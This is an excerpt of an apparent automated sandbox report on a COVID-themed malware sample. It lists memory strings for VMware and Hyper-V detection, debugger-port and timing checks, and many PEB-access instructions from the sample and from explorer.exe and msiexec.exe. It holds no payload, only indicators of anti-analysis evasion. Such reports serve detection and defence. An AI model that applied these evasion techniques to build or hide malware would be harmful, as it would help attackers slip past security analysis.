          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.268460386.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000004.00000000.276275523.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: Po-covid19 2372#w2..exe, 00000000.00000002.254634117.00000000027FE000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000000.274761665.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01534120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01534120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015A41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01530050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01530050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01597016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01593884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01593884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01543B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01543B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01521B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01521B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01544BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01519240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0155927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01515210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01515210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01533A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01528A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01554A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01554A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01537D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01553D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01593540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0151AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01523D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0159A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01544D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0152D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01542581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01512D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01541DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0154A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_0153746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_01596C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeCode function: 3_2_015D1C06 mov eax, dword ptr fs:[00000030h]
